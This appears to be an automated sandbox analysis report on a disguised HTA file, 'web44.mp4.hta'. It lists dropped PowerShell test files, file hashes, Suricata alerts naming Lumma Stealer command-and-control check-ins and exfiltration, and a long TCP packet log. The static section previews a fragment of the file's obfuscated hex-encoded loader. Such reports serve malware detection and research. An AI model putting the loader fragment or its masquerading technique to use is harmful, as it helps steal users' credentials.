SHA-256:	1D00D2B2A2F71DFBFA9D68477B4F8E05592FD82D2ADCE85BDB3ADE09093AECC3
SHA-512:	C02EBE3138772846ECAD5F25C554E8DB905A856104AA0ECFC8EB7C54DDDFA05AAE991BED90DBE04DD72EB4469C16BA6E8EF29D1AFCE3CCB7E3F1CEC91384A076
Malicious:	false
Reputation:	low
Preview:	@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nl2ssos.xdo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3grgxygi.kbl.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4h4hqyxj.n4j.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4nnbc5p.qqi.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	data
Entropy (8bit):	4.504221823608571
TrID:
File name:	web44.mp4.hta
File size:	1'288'850 bytes
MD5:	af46bc7df8441c09296666f0053fb000
SHA1:	f193e30afdc9a54afb68808cd37bc240ec29618d
SHA256:	d734e7c79310f56620a9243f1e3418e15fb507dec460b801eb0e14a7baa145c5
SHA512:	ae1547c0658155d25da9bb186923f551c999e4b88d4501b21051d5183561457ec5c2eec35c22f7a36396306eae1a0757c1680345c89dd07c8cf4248a84e22538
SSDEEP:	12288:V4PkoPkrkvt5cdkFmGQejq6YnkjYzrcdkhj3cR:GPhP8YtCdIFHeBnIeruU7i
TLSH:	1455C64A6A738760C8789875EEC2CA2831767CC9598593AE96DCB43434071F83FC69FD
File Content Preview:	66O75x6ek63k74Y69h6fM6eN20b67n78s73u4ak28Q78K4fi6cp43b59J76P29c7bX76Q61e72H20U75I6dQ73e45D54v3dD20G27U27e3bG66j6fY72g20j28L76l61v72K20W49r46R52I59l79U58E20V3dw20Y30p3bq49h46G52c59E79Z58v20i3cX20r78p4fn6cQ43l59D76y2eR6cu65Z6eD67r74b68G3bI20Q49D46A52f59J79y

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-01T17:11:14.941168+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49849	188.114.96.3	443	TCP
2025-01-01T17:11:15.451455+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49849	188.114.96.3	443	TCP
2025-01-01T17:11:15.451455+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49849	188.114.96.3	443	TCP
2025-01-01T17:11:15.918952+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49855	188.114.96.3	443	TCP
2025-01-01T17:11:16.388302+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49855	188.114.96.3	443	TCP
2025-01-01T17:11:16.388302+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49855	188.114.96.3	443	TCP
2025-01-01T17:11:17.055447+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49865	188.114.96.3	443	TCP
2025-01-01T17:11:17.658072+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49865	188.114.96.3	443	TCP
2025-01-01T17:11:18.138884+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49871	188.114.96.3	443	TCP
2025-01-01T17:11:19.224758+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49881	188.114.96.3	443	TCP
2025-01-01T17:11:20.475520+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49888	188.114.96.3	443	TCP
2025-01-01T17:11:21.780893+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49899	188.114.96.3	443	TCP
2025-01-01T17:11:24.796765+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49918	188.114.96.3	443	TCP
2025-01-01T17:11:25.246850+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49918	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 17:10:03.110160112 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:03.110204935 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:03.110400915 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:03.122349024 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:03.122365952 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:03.615135908 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:03.617630959 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:03.625777006 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:03.625794888 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:03.626019955 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:03.641053915 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:03.687342882 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:03.991633892 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:03.991687059 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:03.991714001 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:03.991801023 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:03.991826057 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:03.991894960 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:03.991977930 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:03.992048025 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:03.992172956 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:03.992211103 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:03.992233038 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:03.992240906 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:03.992273092 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.046668053 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.100411892 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.101038933 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.101094007 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.101104975 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.101191998 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.101222038 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.101253033 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.101255894 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.101268053 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.101363897 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.101372004 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.101440907 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.101985931 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.102174997 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.102201939 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.102283955 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.102292061 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.102397919 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.112653971 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.112718105 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.112746954 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.112771034 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.112781048 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.112857103 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.117187023 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.124063015 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.124090910 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.124290943 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.124299049 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.124373913 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.129601002 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.164483070 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.164516926 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.164549112 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.164556980 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.164627075 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.170672894 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.191415071 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.191530943 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.191543102 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.191577911 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.191781044 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.191787958 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.191973925 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.192004919 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.192033052 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.192035913 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.192044020 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.192126036 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.192423105 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.192579031 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.198577881 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.198683023 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.202743053 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.202811003 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.207940102 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.208015919 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.213191032 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.213295937 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.221389055 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.221484900 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.230468035 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.230554104 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.230561018 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.237039089 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.237123013 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.237131119 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.241298914 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.241380930 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.241391897 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.241476059 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.246043921 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.246129036 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.251458883 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.251563072 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.256665945 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.256774902 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.260966063 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.261104107 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.265742064 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.266443014 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.268583059 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.268686056 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.271882057 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.271939039 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.276262999 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.276328087 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.277467012 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.277580976 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.280302048 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.280390978 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.286478996 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.287190914 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.287204981 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.287256002 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.291210890 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.291383028 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.292871952 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.292973995 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.295617104 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.295666933 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.300580978 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.300630093 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.301191092 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.301232100 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.303632021 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.303687096 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.306391954 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.306449890 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.308856964 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.308901072 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.311604023 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.311661005 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.314505100 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.314565897 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.317656994 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.317709923 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.322976112 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.323019028 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.323458910 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.323507071 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.326109886 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.326160908 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.328516960 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.328567982 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.331022024 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.331068039 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.333492041 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.333539963 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.336268902 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.336318970 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.338588953 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.338638067 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.342641115 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.342689991 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.344000101 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.344050884 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.345616102 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.345665932 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.348172903 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.348221064 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.350354910 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.350408077 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.352725983 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.352773905 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.354964972 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.355014086 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.358438015 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.358489037 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.362929106 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.362986088 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.369132996 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.369189024 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.369319916 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.369364977 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.370842934 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.370887995 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.372533083 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.372584105 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.374121904 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.374169111 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.375762939 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.375824928 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.377358913 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.377405882 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.379595995 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.379648924 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.381237984 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.381293058 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.382533073 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.382587910 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.384079933 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.384133101 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.385641098 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.385693073 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.386976957 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.387029886 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.390614986 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.390798092 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.391266108 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.391335964 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.392585993 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.392669916 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.393882990 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.393939972 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.395415068 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.395464897 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.396648884 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.396722078 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.397978067 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.398037910 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.400012970 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.400065899 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.407017946 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.407026052 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.407058001 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.407088041 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.407102108 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.407115936 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.407393932 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.407442093 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.407450914 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.411025047 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.411082029 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.411088943 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.411185980 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.411238909 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.411246061 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.412190914 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.412374020 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.412380934 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.413368940 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.413422108 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.413429022 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.414629936 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.414680004 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.414688110 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.417015076 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.417071104 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.417079926 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.417958021 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.418159008 CET	49733	443	192.168.2.4	188.114.96.3
